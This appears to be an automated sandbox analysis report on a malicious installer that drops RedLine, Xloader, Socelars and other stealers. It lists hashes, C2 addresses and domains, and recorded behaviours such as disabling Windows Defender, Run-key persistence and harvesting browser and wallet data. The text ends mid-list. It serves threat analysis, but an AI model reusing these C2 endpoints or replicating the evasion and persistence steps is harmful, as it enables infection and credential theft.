Resubmissions
01-11-2021 20:09
211101-yw5kbaafg5 1001-11-2021 07:13
211101-h2lrdsdhhj 1001-11-2021 06:40
211101-hfpk6adhfj 1031-10-2021 18:27
211031-w3r7fsdafj 1031-10-2021 14:10
211031-rgstmscghm 1031-10-2021 08:02
211031-jxchlacefm 1031-10-2021 06:36
211031-hczxqacddp 1031-10-2021 06:23
211031-g5wv4affb3 10Analysis
-
max time kernel
4650s -
max time network
10811s -
platform
windows11_x64 -
resource
win11 -
submitted
01-11-2021 06:40
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-ja-20210920
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7-en-20210920
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win10-ja-20211014
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win10-en-20211014
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10-de-20210920
General
-
Target
setup_x86_x64_install.exe
-
Size
4.5MB
-
MD5
3da25ccfa9c258e3ae26854391531c7b
-
SHA1
1ed5613b0ad8ab4c47f07e52199a4edd27be40e6
-
SHA256
62be0ca52ea9ebc4c577d597b919f6b90cebdcc2179d7d482a04bf5731eec720
-
SHA512
defed576df3d8325259884b485a0dc7cd673c47028e77f189255e27dca312a0befdc8dc84106cc3103a3027e67a835fad899f9361076a64831db144354a4618c
Malware Config
Extracted
redline
srtupdate33
135.181.129.119:4805
Extracted
xloader
2.5
s0iw
http://www.kyiejenner.com/s0iw/
ortopediamodelo.com
orimshirts.store
universecatholicweekly.info
yvettechan.com
sersaudavelsempre.online
face-booking.net
europeanretailgroup.com
umofan.com
roemahbajumuslim.online
joyrosecuisine.net
3dmaker.house
megdb.xyz
stereoshopie.info
gv5rm.com
tdc-trust.com
mcglobal.club
choral.works
onlineconsultantgroup.com
friscopaintandbody.com
midwestii.com
weespiel.com
babyshell.be
gwynora.com
talkthered.com
f-punk.com
frankmatlock.com
clique-solicite.net
clientloyaltysystem.com
worldbyduco.com
kampfsport-erfurt.com
adndpanel.xyz
rocknfamily.net
ambr-creative.com
wwwks8829.com
thuexegiarehcmgoviet.com
brentmurrell.art
wolf-yachts.com
tenpobiz.com
binnamall.com
crestamarti.quest
terry-hitchcock.com
ocreverseteam.com
taxwarehouse2.xyz
megawholesalesystem.com
epstein-advisory.com
enewlaunches.com
iphone13.community
pianostands.com
newspaper.clinic
alamdave.com
costalitaestepona2d.com
arbacan.com
horikoshi-online-tutoring.net
missingthered.com
ecmcenterprises.com
giaohangtietkiemhcm.com
universidademackenzie.com
kveupcsmimli.mobi
ibellex.com
ikigaiofficial.store
jerseyboysnorfolk.com
xiamensaikang.com
lmnsky.com
bra866.com
Signatures
-
Process spawned unexpected child process 12 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1412 4936 rundll32.exe 14 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7928 4936 rundll32.exe 14 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5288 4936 rundll32.exe 14 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6848 4936 rundll32.exe 14 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7788 4936 rundll32.exe 14 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7148 4936 rundll32.exe 14 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 11664 4936 rundll32.exe 14 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 11704 4936 rundll32.exe 14 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 46116 4936 rundll32.exe 14 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 9260 4936 rundll32.exe 14 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5628 4936 rundll32.exe 14 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 31800 4936 rundll32.exe 14 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
resource yara_rule behavioral3/memory/1064-302-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral3/memory/1064-299-0x0000000000000000-mapping.dmp family_redline -
Socelars Payload 2 IoCs
resource yara_rule behavioral3/files/0x000100000002b1d5-207.dat family_socelars behavioral3/files/0x000100000002b1d5-183.dat family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 45 IoCs
description pid Process procid_target PID 3984 created 6140 3984 WerFault.exe 167 PID 2124 created 4064 2124 WerFault.exe 99 PID 1072 created 3324 1072 WerFault.exe 101 PID 6900 created 3612 6900 WerFault.exe 107 PID 6552 created 4600 6552 schtasks.exe 109 PID 5164 created 6020 5164 svchost.exe 194 PID 920 created 1560 920 WerFault.exe 154 PID 2340 created 4708 2340 WerFault.exe 143 PID 5320 created 4872 5320 WerFault.exe 479 PID 1308 created 5872 1308 WerFault.exe 160 PID 5664 created 5684 5664 WerFault.exe 152 PID 5304 created 5124 5304 cmd.exe 457 PID 5804 created 8064 5804 WerFault.exe 319 PID 6216 created 3956 6216 WerFault.exe 446 PID 6136 created 4040 6136 Process not Found 421 PID 4216 created 1900 4216 WerFault.exe 278 PID 4432 created 7392 4432 WerFault.exe 429 PID 6032 created 7548 6032 WerFault.exe 314 PID 2352 created 7636 2352 WerFault.exe 307 PID 7392 created 6952 7392 WerFault.exe 428 PID 3900 created 5392 3900 WerFault.exe 437 PID 7796 created 7068 7796 WerFault.exe 424 PID 1500 created 2584 1500 WerFault.exe 302 PID 5948 created 6228 5948 WerFault.exe 376 PID 3324 created 7744 3324 WerFault.exe 308 PID 4872 created 4228 4872 WerFault.exe 409 PID 1428 created 5280 1428 WerFault.exe 455 PID 3040 created 6084 3040 WerFault.exe 459 PID 6712 created 6252 6712 WerFault.exe 431 PID 4872 created 8176 4872 WerFault.exe 571 PID 8032 created 3720 8032 WerFault.exe 461 PID 5528 created 5624 5528 WerFault.exe 490 PID 1052 created 3724 1052 WerFault.exe 558 PID 7696 created 30840 7696 WerFault.exe 516 PID 9024 created 31180 9024 WerFault.exe 518 PID 8924 created 8252 8924 WerFault.exe 569 PID 10128 created 50108 10128 WerFault.exe 535 PID 10056 created 49716 10056 WerFault.exe 527 PID 11340 created 7800 11340 WerFault.exe 544 PID 31816 created 11692 31816 WerFault.exe 602 PID 31872 created 31788 31872 WerFault.exe 607 PID 32200 created 8984 32200 WerFault.exe 580 PID 32388 created 9416 32388 WerFault.exe 585 PID 16968 created 15296 16968 WerFault.exe 720 PID 49492 created 48612 49492 WerFault.exe 815 -
Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
description pid Process procid_target PID 6244 created 5528 6244 svchost.exe 192 PID 6244 created 5528 6244 svchost.exe 192 PID 6244 created 3792 6244 svchost.exe 236 PID 6244 created 3792 6244 svchost.exe 236 PID 6244 created 3436 6244 svchost.exe 551 PID 6244 created 3436 6244 svchost.exe 551 PID 6244 created 7632 6244 svchost.exe 348 PID 6244 created 7632 6244 svchost.exe 348 PID 15060 created 17420 15060 powershell.exe 743 PID 15152 created 17420 15152 powershell.exe 743 -
Turns off Windows Defender SpyNet reporting 2 TTPs
-
suricata: ET MALWARE FormBook CnC Checkin (GET)
suricata: ET MALWARE FormBook CnC Checkin (GET)
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
-
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Xloader Payload 2 IoCs
resource yara_rule behavioral3/memory/3940-476-0x0000000002FA0000-0x0000000002FC9000-memory.dmp xloader behavioral3/memory/5312-489-0x0000000000380000-0x00000000003A9000-memory.dmp xloader -
resource yara_rule behavioral3/files/0x000100000002b1c7-159.dat aspack_v212_v242 behavioral3/files/0x000100000002b1c8-158.dat aspack_v212_v242 behavioral3/files/0x000100000002b1ca-165.dat aspack_v212_v242 behavioral3/files/0x000100000002b1ca-166.dat aspack_v212_v242 behavioral3/files/0x000100000002b1c7-162.dat aspack_v212_v242 behavioral3/files/0x000100000002b1c7-161.dat aspack_v212_v242 behavioral3/files/0x000100000002b1c8-160.dat aspack_v212_v242 -
Adds policy Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run control.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\NPRPDXW = "C:\\Program Files (x86)\\Mrbnhc\\xfatghhxptwtr.exe" control.exe -
Blocklisted process makes network request 8 IoCs
flow pid Process 151 3652 mshta.exe 153 3652 mshta.exe 935 31772 MsiExec.exe 939 31772 MsiExec.exe 951 31772 MsiExec.exe 953 31772 MsiExec.exe 962 31772 MsiExec.exe 989 31772 MsiExec.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 5 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts ShareFolder.exe File opened for modification C:\Windows\system32\drivers\etc\hosts ShareFolder.exe File opened for modification C:\Windows\system32\drivers\etc\hosts ShareFolder.exe File opened for modification C:\Windows\system32\drivers\etc\hosts ShareFolder.exe File opened for modification C:\Windows\system32\drivers\etc\hosts Hamivapasi.exe -
Executes dropped EXE 64 IoCs
pid Process 2172 setup_installer.exe 5056 setup_install.exe 4064 Sun03d477f1a31.exe 4088 Sun039750b00c.exe 3324 Sun033e271e0ce96c08.exe 4600 Sun03e4aeb7e43a1c.exe 3612 Sun0324aba28588c0.exe 3304 Sun0397381f1f458e.exe 4708 Sun03f0dc4460bc9.exe 2900 Sun038aa349e3318e.exe 1456 Sun038db98f99bf9a.exe 3652 Sun0328255c4bce6fb.exe 812 Sun03ea09aa5c9686e5.exe 2132 Sun03f5d51697d04.exe 3132 Sun0351a0558292.exe 3504 Sun03f5d51697d04.tmp 2944 Sun0397381f1f458e.exe 5192 Sun03f5d51697d04.exe 5312 colorcpl.exe 5384 wXE1XgqZIR_W9IM.exE 1064 Sun03f0dc4460bc9.exe 5580 1907429.exe 5772 tv3K6hSK60TEWOTPIZxPD0z1.exe 5816 qQbVMM4g0bpXElDCk7u81Gef.exe 5800 LzmwAqmV.exe 5924 6722478.exe 4944 Chrome5.exe 4264 3782043.exe 5396 DownFlSetup110.exe 4716 dyEvj3hC2t7OMuwoWXdKUmK3.exe 3392 nuv3nTIlFEYBrkPp1N3C1htI.exe 4708 hgmCgKLLp6_aBM_p6OXdxhM4.exe 5848 9Zb2WtRSw11ACQNzk2XLqI6n.exe 5920 F37OFtk5v9UdORoY8t4Donzo.exe 5808 46puvSQnm9v3JLD7WOWMRWFL.exe 5724 ZP0MR34BkzoGGsDYhHusS489.exe 5612 024wC3SO_qVtbE4Y9Lz5RQz9.exe 5684 EBU0gvgBJleOPWdQsXtPukc0.exe 1560 VaQQKPf9T577ZPDm1uawzRQO.exe 4872 FvMCEwri6_qByE_3M8DbslRU.exe 5472 Zx0htBgAf3gZhfn9rCPnpedY.exe 5064 mXtIGk3ofwNa4d7r1RCLpLFz.exe 5124 K0TibwmFldhZ549RofY1erc4.exe 5872 aAXlLwdC9UKnsWc8aTXy3Ptd.exe 6040 VM2skHGFpeBDBysR6622fBC8.exe 5164 svchost.exe 5256 S7koKpK33vLWjAxi5chFkuJ9.exe 5248 nxfL7_6XSgUfDUVDEan06Mbe.exe 5020 Hj5Pq1vV39n8G1DTpop2wdl2.exe 1652 postback.exe 852 4844256.exe 1512 cmd.exe 1232 jg1_1faf.exe 496 nXZzPjm8z9HP4_SUYbwTPDKm.exe 1616 B2zEVweKaLRoMVSBnxG2zIKP.exe 3224 cutm3.exe 5864 4990988.exe 3956 Soft1WW01.exe 2916 M35Lp9gfDfkC86gCoe6z36z0.exe 5740 4kw4eKu9gndEHqJKFw6yErfF.exe 3792 taskkill.exe 5528 AdvancedRun.exe 6020 4.exe 6176 4kw4eKu9gndEHqJKFw6yErfF.tmp -
Sets service image path in registry 2 TTPs
-
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 20 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion F37OFtk5v9UdORoY8t4Donzo.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion S7koKpK33vLWjAxi5chFkuJ9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4844256.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3176.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion VM2skHGFpeBDBysR6622fBC8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3782043.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6722478.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion F37OFtk5v9UdORoY8t4Donzo.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4844256.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 9Zb2WtRSw11ACQNzk2XLqI6n.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 9Zb2WtRSw11ACQNzk2XLqI6n.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1959615.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion VM2skHGFpeBDBysR6622fBC8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6722478.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion S7koKpK33vLWjAxi5chFkuJ9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 997740.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 997740.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3176.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1959615.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3782043.exe -
Drops startup file 3 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8CD8CA21.exe 46puvSQnm9v3JLD7WOWMRWFL.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8CD8CA21.exe 46puvSQnm9v3JLD7WOWMRWFL.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QUKHyXjH3qRKVkqx.vbs QUKHyXjH3qRKVkqx.exe -
Loads dropped DLL 64 IoCs
pid Process 5056 setup_install.exe 5056 setup_install.exe 5056 setup_install.exe 5056 setup_install.exe 5056 setup_install.exe 5056 setup_install.exe 3504 Sun03f5d51697d04.tmp 5312 colorcpl.exe 6140 rundll32.exe 2916 M35Lp9gfDfkC86gCoe6z36z0.exe 2916 M35Lp9gfDfkC86gCoe6z36z0.exe 6176 4kw4eKu9gndEHqJKFw6yErfF.tmp 2916 M35Lp9gfDfkC86gCoe6z36z0.exe 3924 msiexec.exe 2916 M35Lp9gfDfkC86gCoe6z36z0.exe 5812 Calculator Installation.exe 5812 Calculator Installation.exe 2916 M35Lp9gfDfkC86gCoe6z36z0.exe 2916 M35Lp9gfDfkC86gCoe6z36z0.exe 5812 Calculator Installation.exe 5812 Calculator Installation.exe 2916 M35Lp9gfDfkC86gCoe6z36z0.exe 5812 Calculator Installation.exe 2916 M35Lp9gfDfkC86gCoe6z36z0.exe 2916 M35Lp9gfDfkC86gCoe6z36z0.exe 2916 M35Lp9gfDfkC86gCoe6z36z0.exe 2916 M35Lp9gfDfkC86gCoe6z36z0.exe 2916 M35Lp9gfDfkC86gCoe6z36z0.exe 8064 rundll32.exe 8028 Qa0ydjRf2tdAW_WXEvJN1dhr.tmp 8052 mSbGRGi7Yiq04OsOdmXbOJGl.tmp 2004 s8SU1s3eNIwgJA57Ks5cMfdE.exe 2004 s8SU1s3eNIwgJA57Ks5cMfdE.exe 3584 LvP2JR61i9foyFZ2pnR1CRLZ.tmp 7456 GVCbJgN4fvZ0RwrZvawYRPZB.tmp 7312 FVFTOIzhXOwuCYMlRx7WbAzn.exe 7312 FVFTOIzhXOwuCYMlRx7WbAzn.exe 2004 s8SU1s3eNIwgJA57Ks5cMfdE.exe 7312 FVFTOIzhXOwuCYMlRx7WbAzn.exe 1604 setup.exe 1604 setup.exe 7296 setup.exe 7296 setup.exe 6472 setup.exe 6472 setup.exe 6768 regsvr32.exe 6952 rundll32.exe 5392 rundll32.exe 6756 msiexec.exe 6756 msiexec.exe 7776 msiexec.exe 7776 msiexec.exe 33668 installer.exe 33668 installer.exe 33668 installer.exe 47000 MsiExec.exe 47000 MsiExec.exe 3724 rundll32.exe 8252 rundll32.exe 1604 setup.exe 1604 setup.exe 11140 Calculator.exe 6472 setup.exe 1604 setup.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions 46puvSQnm9v3JLD7WOWMRWFL.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 46puvSQnm9v3JLD7WOWMRWFL.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SpyNetReporting = "0" 46puvSQnm9v3JLD7WOWMRWFL.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SubmitSamplesConsent = "0" 46puvSQnm9v3JLD7WOWMRWFL.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Public\Documents\03B82AA2\svchost.exe = "0" 46puvSQnm9v3JLD7WOWMRWFL.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 46puvSQnm9v3JLD7WOWMRWFL.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8CD8CA21.exe = "0" 46puvSQnm9v3JLD7WOWMRWFL.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths 46puvSQnm9v3JLD7WOWMRWFL.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\Pictures\Adobe Films\46puvSQnm9v3JLD7WOWMRWFL.exe = "0" 46puvSQnm9v3JLD7WOWMRWFL.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection 46puvSQnm9v3JLD7WOWMRWFL.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet 46puvSQnm9v3JLD7WOWMRWFL.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features 46puvSQnm9v3JLD7WOWMRWFL.exe -
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts WindowsUpdate.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 18 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\8CD8CA21 = "C:\\Users\\Public\\Documents\\03B82AA2\\svchost.exe" 46puvSQnm9v3JLD7WOWMRWFL.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run setup.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run setup.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Internet Explorer\\Gaexiwawisi.exe\"" Hamivapasi.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\8CD8CA21 = "C:\\Users\\Public\\Documents\\03B82AA2\\svchost.exe" 8CD8CA21.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows NT\\ZHuqoshybila.exe\"" ShareFolder.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate = "C:\\Users\\Admin\\AppData\\Local\\Win32\\WindowsUpdate.exe䈀" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 1462013.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --iUSIg" setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --iUSIg" setup.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate = "C:\\Users\\Admin\\AppData\\Local\\Win32\\WindowsUpdate.exe쌀" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate = "C:\\Users\\Admin\\AppData\\Local\\Win32\\WindowsUpdate.exe耀" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --iUSIg" setup.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate = "C:\\Users\\Admin\\AppData\\Local\\Win32\\WindowsUpdate.exe夀" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate = "C:\\Users\\Admin\\AppData\\Local\\Win32\\WindowsUpdate.exe" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\QUKHyXjH3qRKVkqx = "\"C:\\Users\\Admin\\AppData\\Roaming\\QUKHyXjH3qRKVkqx.exe\"" QUKHyXjH3qRKVkqx.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 9Zb2WtRSw11ACQNzk2XLqI6n.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 4844256.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 8CD8CA21.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 3782043.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA S7koKpK33vLWjAxi5chFkuJ9.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 997740.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 46puvSQnm9v3JLD7WOWMRWFL.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 3176.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA F37OFtk5v9UdORoY8t4Donzo.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA jg1_1faf.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA VM2skHGFpeBDBysR6622fBC8.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 6722478.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 46puvSQnm9v3JLD7WOWMRWFL.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 8CD8CA21.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 1959615.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\R: installer.exe File opened (read-only) \??\S: installer.exe File opened (read-only) \??\I: installer.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\A: installer.exe File opened (read-only) \??\Q: installer.exe File opened (read-only) \??\T: installer.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\A: installer.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\U: installer.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\R: installer.exe File opened (read-only) \??\M: installer.exe File opened (read-only) \??\Q: installer.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\J: installer.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\G: installer.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\J: installer.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\O: installer.exe File opened (read-only) \??\Z: installer.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\S: installer.exe File opened (read-only) \??\H: installer.exe File opened (read-only) \??\F: installer.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\X: installer.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\X: installer.exe File opened (read-only) \??\U: installer.exe File opened (read-only) \??\W: installer.exe File opened (read-only) \??\G: 